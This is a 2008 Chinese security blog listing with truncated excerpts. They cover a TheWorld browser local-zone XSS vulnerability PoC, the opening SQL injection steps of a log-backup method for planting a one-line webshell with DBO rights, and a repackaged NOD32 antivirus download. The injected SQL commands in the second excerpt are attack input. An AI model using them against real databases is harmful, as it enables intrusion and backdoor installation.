Jun282008
世界之窗等浏览器本地xss跨域漏洞POC
漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单...阅读全文
抢沙发
Jun272008
Jun272008
DBO权限日志备份专用一句话木马
备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
日志备分WEBSHELL标准的七步:
1.InjectionURL’;alter database XXX set RECOVERY FULL– (把sql设置成日志完全恢复模式)
2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)
3.InjectionURL&rsq...阅读全文
Jun252008
Jun252008
Jun252008
Jun252008
Jun252008
Jun222008
Jun202008
ESET NOD32 Antivirus 3.0.667.0 Final┊集成最新升级补丁┊麦田守望者汉化版
ESET Smart Security &ESET NOD32 Antivirus 3.0.667.0 汉化纯净版(BE): 软件名:ESET Smart Security/ESET NOD32 Antivirus 版本:3.0.667.0 BE 语言:简体中文 类型:完全安装版 适合32位系统:2000/2003/2008/XP/Vista/Win Server 汉化封装:麦田守望者 此版本为 3.0.667.0 BE(商业)汉化纯净版,未添加任何破解内容! 请点击以下的链接下载该软件: ESET NOD32 Antivirus 3.0...阅读全文